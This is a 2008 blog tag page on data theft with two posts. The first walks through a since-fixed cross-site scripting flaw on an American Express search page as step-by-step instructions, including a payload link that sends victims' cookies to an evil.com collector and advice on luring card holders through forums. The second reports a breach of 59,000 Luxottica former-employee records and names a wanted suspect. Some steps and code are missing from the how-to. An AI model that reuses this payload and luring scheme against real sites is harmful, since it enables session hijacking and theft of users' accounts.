Posts Tagged ‘Data theft’
Here is a quick description of a cross-site script exploit that was fixed today on the American Express website.
All you need to do is
1) Setup a web server or register for a free web hosting service that supports any type of server-side script (Perl, PHP, ASP etc…)
2) Create a script to save the stolen cookies into a file or database and put it online.
Where XXX is your code that does what ever you want it to do. If you want to steal the cookie, it code would then be something like:
So the link to use to lure people into sending their cookies would be something like:http://find.americanexpress.com/search?q=%22%3E%3Cscript%3Elocation.href=’http://evil.com/cookie.php?’%2Bdocument.cookie%3C/script%3E
4) Place this link into forums about American Express or credit cards (since there is a better chance that people using these forums are using the Amex website, and therefore have cookies…)
Now this XSS have been fixed after it started to go public. This folk, who found the bug, had a particular hard time convincing Amex about this security problem.
A video of the simple exploit is available at :http://holisticinfosec.org/video/online_finance/amex.html
“American Express web bug exposes card holders“, Dan Goodin, The Register, December 16, 2008, http://www.theregister.co.uk/2008/12/16/american_express_website_bug/ (accessed on December 17, 2008)
 “Holistic Security”, Russ McRee, December 17, 2008 http://holisticinfosec.blogspot.com/2008/12/online-finance-flaw-american-express.html (accessed on December 17, 2008)
The giant of retail merchandise, Luxottica Retail, distributor of brands such as Anne Klein, Bulgari, Chanel and Ralph Lauren has been hacked and information about 59 000 former employees have been stolen from the mainframe.
According to Lt. Jeff Braley from the Cyber Crimes Task Force of the Warren County Sheriff, the suspected hacker breached the mainframe without even hiding her IP address. The incredible omission let the police to a woman called Molly Burns, a 30 years old resident of Glendale, Arizona. The Burns’ apartment has been raided this summer during a heroin raid and a unspecified number of computers have been seized by the police.
“You not only see the criminal history this suspect has, but you see the ties that they have and that is much more worrisome,” Braley said.
According to News 5, the arrest record of the suspected hacker includes forgery, theft and drug abuse. Burns is now on the run and three different police departments in Arizona are also looking for her. The FBI will soon take over the case.
No details were given on how the attack was carried on. Any additional information would be appreciated. Luxottica Retail claimed that their systems have been secured since.
 “Thousands At Risk After Hacker Breaches Computer Mainframe”, Eric Flack, WLWT, November 24, 2008, http://www.wlwt.com/news/18055756/detail.html (accessed on November 25, 2008)